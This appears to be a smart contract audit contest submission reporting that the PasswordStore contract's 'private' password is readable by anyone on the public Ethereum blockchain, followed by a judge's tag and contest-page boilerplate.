Unsecure Data Storage on the Ethereum Blockchain
Summary
The PasswordStore smart contract provides a means of storing a private password with restricted access, but there are security concerns related to storing sensitive data on the Ethereum blockchain.
Vulnerability Details
While PasswordStore has an access control mechanism to limit access to the stored password, it's essential to recognize the risks associated with on-chain data storage. Ethereum is a public blockchain, meaning all transactions and data are transparent and can be accessed by anyone. This implies that although the getPassword function is restricted to the owner, the password data itself is exposed on the blockchain, potentially susceptible to unintended or malicious access.
Impact
Storing sensitive data, like passwords, on a public blockchain such as Ethereum can expose it to security risks. Even with access restrictions, the data remains on-chain and could be accessed and misused by other contracts or parties.
Tools Used
Manual code review.
Recommendations
Avoid storing sensitive data directly on the blockchain. Consider using off-chain or decentralized storage solutions.
Lead Judging Commences
finding-anyone-can-read-storage
Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.